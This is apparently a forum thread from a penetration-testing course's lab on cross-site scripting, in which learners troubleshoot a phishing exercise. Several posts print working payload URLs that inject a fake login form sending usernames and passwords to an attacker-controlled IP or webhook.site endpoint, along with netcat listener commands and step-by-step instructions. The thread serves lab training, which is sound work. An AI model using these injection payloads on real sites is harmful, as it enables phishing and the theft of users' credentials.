Cross-Site Scripting (XSS) Module: "Issue in sending URL!" at the Phishing Section

Not sure why everyone is so hung up on encoding. I just revisited this challenge and there should be no need for you to encode anything. It should be as easy as:

1. Load the /phishing page.
2. Paste the JavaScript payload (after you edit it with ip/port) into the online image viewer box and hit enter.
3. Then look to the url after the webpage embeds the javascript form. (Note that its already encoded)
4. Launch your netcat listener with a reasonable port like 3333 or 8009, or anything but 80.
5. Copy the whole url from step 3 to the send.php text box.

Feel free to message me if your stuck, but this shouldn’t be frustrating. Don’t even worry if you can’t clean it perfectly as the extra '> shouldn’t mess the exercise up.
-onthesauce

It seems it works fine in the Pwnbox they provide, but using your own linux machine through the VPN doesn’t work. For me, at least. Encoded or not.

I’m on Discord but I barely ever use it. Can you post the URL (no encoding) you are using? From the image you posted it looks like the code isn’t being injected properly. Feel free to DM me, but it can help others to solve these issues on the forum.

I actually solved it thank you though

Im also having this problem. I encoded the url and it always gives this error.

Also, when I try to set up the netcat listen server on 80 it says is already in use. Someone can please give me some tip ?

Btw, Im sorry I forgot the url: http://10.129.107.163/phishing/index.php?url=document.write(‘<h3>Please+login+to+continue<%2Fh3><form+action%3Dhttp%3A%2F%2F10.10.14.132><input+type%3D”username”+name%3D”username”+placeholder%3D”Username”><input+type%3D”password”+name%3D”password”+placeholder%3D”Password”><input+type%3D”submit”+name%3D”submit”+value%3D”Login”><%2Fform>’)%3B

I tried both with the machine ip and the target machine, also the listener doesn’t catch anything. Im the whole day on this question.

You need to remove the urlform too. Set the listener to something like 8009 and make sure to add it you your address in the url. The only thing you don’t need to worry about is the >' that gets left behind.

I am guessing the script in the background browses to the pages url, if you don’t remove the urlform, it probably tries to fill in the information there.

Set the listener to something like 8009 and make sure to add it you your address in the url

This one did the trick! Thank you so much!

Anyone helps me, I tested my code and it works really well, but I cannot submit the url to the send.php page:

My URL:

http://10.129.91.55/phishing/index.php?url='><h3>Please+login+to+continue<%2Fh3><form+action%3Dhttp%3A%2F%2F10.10.14.213><input+type%3D"username"+name%3D"username"+placeholder%3D"Username"><input+type%3D"password"+name%3D"password"+placeholder%3D"Password"><input+type%3D"submit"+name%3D"submit"+value%3D"Login"><%2Fform><script>document.getElementById('urlform').remove()%3B<%2Fscript><img%20src='

What do you mean you cannot submit it to the URL? If it is flagging it for an error, then it might not be encoded right.

Thank you, I got the flag. My main problem is on my pentest device I had enabled the firewall that only allows SSH connection.

Hi, I’ve been struggling with the same issue, where I’m pretty sure my payload and url are both correct (have tested them manually), but the /send.php page just doesn’t accept them.

Backend: A url generated by webhook.site (I’ve tried both http and https), e.g

https://webhook.site/uuid_of_my_generated_webhook

Payload:

http://TARGET_BOX_IP/phishing/index.php?url='/><h3>Please login to continue</h3><form action=http://webhook.site/uuid_of_my_generated_webhook><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form><script>document.getElementById('urlform').remove();</script><!--

Manually navigating to the payload url and filling out the form results in a log in my webhook.site dashboard (on a separate computer, not in the attack box, so the firewall is not a problem, the form action call does go out of the attack box to webhook.site’s servers). /send.php does not accept this payload.

FYI I’ve also tried this using a netcat server running on my attack box too. Used the attack box’s global ip queried through curl ifconfig.me in the payload. The Netcat server was running on port 8000. Started by sudo nc -lvnp 8000. Manually filling out the form resulted in the username and password being logged by the netcat server (in the attack box) successully. /send.php doesn’t accept this payload either.

I’ve tried several other payloads, all of which work, including:

http://TARGET_BOX_IP/phishing/index.php?url='/><h3>Please login to continue</h3><form action=https://webhook.site/my_generated_uuid_hook_url><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form><script>document.getElementById('urlform').remove();</script><!--

Does anybody have a clue what the solution here is? Why doesn’t it accept my url (I’ve tried it both encoded and unencoded)?

So I’ve been sparring with this one for a day now, and despite successful tests from setting up the phishing page and having it reroute without issues, all the way through to the PHP server capturing the test login info perfectly… I continue to get the “Issue in sending URL!” message when trying to submit the URL. I’ve also tried to submit it both decoded and encoded (as it is in the address bar) after walking through this thread.

As trusting as send.php may be, its starting to feel like my URL is where it draws the line…

http://TARGET_BOX_IP/phishing/index.php?url=%27+onerror%3Ddocument.write(%27%3Ch3%3EPlease+login+to+continue%3C%2Fh3%3E%3Cform+action%3Dhttp%3A%2F%2F165.232.100.180%3A88%3E%3Cinput+type%3D%27username%27+name%3D%27username%27+placeholder%3D%27Username%27%3E%3Cinput+type%3D%27password%27+name%3D%27password%27+placeholder%3D%27Password%27%3E%3Cinput+type%3D%27submit%27+value%3D%27Login%27%3E%3C%2Fform%3E%3Cscript%3Edocument.getElementById(%27urlform%27).remove()%3C%2Fscript%3E%3C!–

Any insight would be super appreciated. Thank you!

Had issues with this module when using javascript. Could solve it by using html only!

• type html to close the image url and element
• append a one liner with the login form (plain html) with your IP and port
• paste that html one liner in the index.php url field
• you should now see a login form on the same page
• do not yet populate the form, but copy the full URL, this is what you will send later
• populate the login form with username and password and submit
• your webserver should be called with the username and password
• this confirmed your setup works with the URL captured above
• go to the send.php and submit the captured URL
• you will get a call on your webserver with a username and password
• go to the login.php and populate

Only encode the script part like

http://10.129.23.91/phishing/index.php?url=ENCODEDhttp://10.10.14.138:8080ENCODED
that worked for me and also I used port 8080 for local server (php -S 0.0.0.0:8080)

I was lazy so used an online encoder completely random chosen (https://www.urlencoder.org/)

seems like there is the “onerror” %27+onerror%3D I used:

image931×137 6.22 KB

I’m stuck but I can send the url but I don’t recieve anything, I read the code and clean perfectly my payload thinking that it was that, but I saw that the IP of my tun0 machine and the pwnbox it gives an error when I use it in the payload example I use http://fullIPtun0:8080 it gives me “Issue in sending URL” but when I use http://0.0.0.0:8080 it works and sent url but doesnt give me nothing back. someone have an idea why.
this is how my phishing login looks like, I think its really clean

image845×425 27 KB

So I send it and nothing come back, but when i try my own link it gives me what I submit so anybody knows something that could help me why :/?

image1760×297 121 KB

When I did this section I had the exact same issues and I wanted to smash something. For some reason this one doesn’t work with the VPN. You need to use the Pwnbox for this task. Seems they still haven’t resolved this issue.

Also don’t forget encoding.

yes only work with the pwnbox thanks